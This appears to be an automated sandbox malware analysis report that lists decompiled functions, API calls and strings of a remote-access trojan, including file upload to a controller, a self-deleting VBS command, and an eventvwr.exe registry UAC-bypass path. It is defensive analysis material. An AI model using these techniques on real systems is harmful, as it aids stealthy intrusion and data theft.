                                                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                  • API String ID: 2490988753-744132762
                                                                                  • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                                                                  • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
                                                                                  • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                                                                  • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
                                                                                  Function 00411899 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417sleepfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                                                                                    • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                                                                    • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                                                                    • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                                                                  • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                                                                                  • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                                                                                  • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                                                                                  • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                                                                                  • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                                                                                  • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                                                                                  • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                                                                                  • Sleep.KERNEL32(00000064), ref: 00411C63
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                  • String ID: /stext "$$.F$@#G$@#G
                                                                                  • API String ID: 1223786279-2596709126
                                                                                  • Opcode ID: cbf778e88f98837d315c4bcc92349f0fdda0b1e36815e455587155ffc232fea6
                                                                                  • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
                                                                                  • Opcode Fuzzy Hash: cbf778e88f98837d315c4bcc92349f0fdda0b1e36815e455587155ffc232fea6
                                                                                  • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
                                                                                  Function 0044D7E0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 376COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID: pF
                                                                                  • API String ID: 269201875-2973420481
                                                                                  • Opcode ID: e28a4125cd182155f8106b0edc14aa680027b5eb54e98ed2c6064bdca11899c6
                                                                                  • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
                                                                                  • Opcode Fuzzy Hash: e28a4125cd182155f8106b0edc14aa680027b5eb54e98ed2c6064bdca11899c6
                                                                                  • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
                                                                                  Function 0040DE34 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 223processsynchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
                                                                                    • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
                                                                                  • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                                                                  • String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
                                                                                  • API String ID: 193334293-3226144251
                                                                                  • Opcode ID: ef5c990305df2b07c466807072a0eb0cb33ccac4968cb1173633bd0b5d26d1b3
                                                                                  • Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
                                                                                  • Opcode Fuzzy Hash: ef5c990305df2b07c466807072a0eb0cb33ccac4968cb1173633bd0b5d26d1b3
                                                                                  • Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A
                                                                                  Function 0041A419 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0041A749
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEnumOpen
                                                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                  • API String ID: 1332880857-3714951968
                                                                                  • Opcode ID: dcededb39bf263de4c0e491218869729ded1d12d81c3355e778ba101c7639554
                                                                                  • Instruction ID: 699f57f5c891f1d806a7f6c627c3d9f808e7165cae3c76f1f7c8ebce292c0808
                                                                                  • Opcode Fuzzy Hash: dcededb39bf263de4c0e491218869729ded1d12d81c3355e778ba101c7639554
                                                                                  • Instruction Fuzzy Hash: BC8152311183419BC328EB51D891EEFB7E8EF94348F10493FF586921E2EF749949CA5A
                                                                                  Function 0041B344 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                                                                                  • GetCursorPos.USER32(?), ref: 0041B39E
                                                                                  • SetForegroundWindow.USER32(?), ref: 0041B3A7
                                                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                                                                                  • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                                                                                  • ExitProcess.KERNEL32 ref: 0041B41A
                                                                                  • CreatePopupMenu.USER32 ref: 0041B420
                                                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                  • String ID: Close
                                                                                  • API String ID: 1657328048-3535843008
                                                                                  • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                                                                  • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
                                                                                  • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                                                                  • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
                                                                                  Function 00443268 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$Info
                                                                                  • String ID:
                                                                                  • API String ID: 2509303402-0
                                                                                  • Opcode ID: d352d52f1b9345d75488c5de9eae0d63737ffa17687bf4e8527101d8642b8356
                                                                                  • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
                                                                                  • Opcode Fuzzy Hash: d352d52f1b9345d75488c5de9eae0d63737ffa17687bf4e8527101d8642b8356
                                                                                  • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
                                                                                  Function 00407BB6 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
                                                                                  • __aulldiv.LIBCMT ref: 00407D89
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407FA0
                                                                                  • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408038
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                  • API String ID: 3086580692-2596673759
                                                                                  • Opcode ID: 7b17a8036d9f6e7d56edc0ad43bfc44500a09440ecc07cafeb796fefe75cf2ad
                                                                                  • Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
                                                                                  • Opcode Fuzzy Hash: 7b17a8036d9f6e7d56edc0ad43bfc44500a09440ecc07cafeb796fefe75cf2ad
                                                                                  • Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B
                                                                                  Function 0040C3B8 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
                                                                                    • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                                                                    • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00472200), ref: 00412104
                                                                                    • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041211D
                                                                                    • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                                                                                  • ExitProcess.KERNEL32 ref: 0040C57D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                  • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                                                                                  • API String ID: 1913171305-2600661426
                                                                                  • Opcode ID: 858c96d2eebee9d2ed453ef73d9a1e38767332891e31fed0b9ff785c69f907f2
                                                                                  • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
                                                                                  • Opcode Fuzzy Hash: 858c96d2eebee9d2ed453ef73d9a1e38767332891e31fed0b9ff785c69f907f2
                                                                                  • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
                                                                                  Function 00413606 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 65535$udp
                                                                                  • API String ID: 0-1267037602
                                                                                  • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                                                                  • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
                                                                                  • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                                                                  • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
                                                                                  Function 004385DA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                                                                                  • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                                                                                  • __dosmaperr.LIBCMT ref: 00438646
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                                                                                  • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                                                                                  • __dosmaperr.LIBCMT ref: 00438683
                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                                                                                  • __dosmaperr.LIBCMT ref: 004386D7
                                                                                  • _free.LIBCMT ref: 004386E3
                                                                                  • _free.LIBCMT ref: 004386EA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                  • String ID:
                                                                                  • API String ID: 2441525078-0
                                                                                  • Opcode ID: 2428d6136fa203607d9b9ba94df6370f818a7f930700a212aadf753765814adb
                                                                                  • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
                                                                                  • Opcode Fuzzy Hash: 2428d6136fa203607d9b9ba94df6370f818a7f930700a212aadf753765814adb
                                                                                  • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
                                                                                  Function 0044DC05 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 204COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID: pF$tF
                                                                                  • API String ID: 269201875-2954683558
                                                                                  • Opcode ID: f1956a37fb57c14efad3a30e8a4a694615c5a3291379cc37ed6cd6fb8765ce3b
                                                                                  • Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
                                                                                  • Opcode Fuzzy Hash: f1956a37fb57c14efad3a30e8a4a694615c5a3291379cc37ed6cd6fb8765ce3b
                                                                                  • Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58
                                                                                  Function 00405480 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,?), ref: 0040549F
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                                                                                  • TranslateMessage.USER32(?), ref: 0040555E
                                                                                  • DispatchMessageA.USER32(?), ref: 00405569
                                                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                                                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                  • API String ID: 2956720200-749203953
                                                                                  • Opcode ID: eb881b910dc8f90dddaf4e8bc84f9c5ff221e41cd07db74d4947057dfcb05d87
                                                                                  • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                                                                                  • Opcode Fuzzy Hash: eb881b910dc8f90dddaf4e8bc84f9c5ff221e41cd07db74d4947057dfcb05d87
                                                                                  • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                                                                                  Function 0041601D Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00416123
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00416132
                                                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                  • String ID: <$@$@%G$@%G$Temp
                                                                                  • API String ID: 1704390241-4139030828
                                                                                  • Opcode ID: 08cb1755ce7b468823e10bc19469487db811a439f2e1fee2786586d5cf0c4217
                                                                                  • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                                                                                  • Opcode Fuzzy Hash: 08cb1755ce7b468823e10bc19469487db811a439f2e1fee2786586d5cf0c4217
                                                                                  • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                                                                                  Function 004066A6 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                                                                                  • ExitProcess.KERNEL32 ref: 00406782
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExecuteExitProcessShell
                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                                                                  • API String ID: 1124553745-4172179172
                                                                                  • Opcode ID: c9eebefaaca7104524450088b03de3167d5d157c3cb18eb3619efb5a887ad6d4
                                                                                  • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                                                                                  • Opcode Fuzzy Hash: c9eebefaaca7104524450088b03de3167d5d157c3cb18eb3619efb5a887ad6d4
                                                                                  • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                                                                                  Function 00418AC3 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                  • String ID:
                                                                                  • API String ID: 221034970-0
                                                                                  • Opcode ID: 5ca2c9f4f824d20fd2b15ead523db82676a1b8751022075e59f45b476e20e695
                                                                                  • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                                                                                  • Opcode Fuzzy Hash: 5ca2c9f4f824d20fd2b15ead523db82676a1b8751022075e59f45b476e20e695
                                                                                  • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                                                                                  Function 00445631 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00445645
                                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                  • _free.LIBCMT ref: 00445651
                                                                                  • _free.LIBCMT ref: 0044565C
                                                                                  • _free.LIBCMT ref: 00445667
                                                                                  • _free.LIBCMT ref: 00445672
                                                                                  • _free.LIBCMT ref: 0044567D
                                                                                  • _free.LIBCMT ref: 00445688
                                                                                  • _free.LIBCMT ref: 00445693
                                                                                  • _free.LIBCMT ref: 0044569E
                                                                                  • _free.LIBCMT ref: 004456AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                                                                  • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                                                                                  • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                                                                  • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                                                                                  Function 00417F6A Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00417F6F
                                                                                  • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
                                                                                  • Sleep.KERNEL32(000003E8), ref: 004180B3
                                                                                  • GetLocalTime.KERNEL32(?), ref: 004180BB
                                                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                  • API String ID: 489098229-3790400642
                                                                                  • Opcode ID: 384f29ba9d6e9cc4eb2ffe2d10ebc108aeca390d7ff074f032fb6a7982b51f69
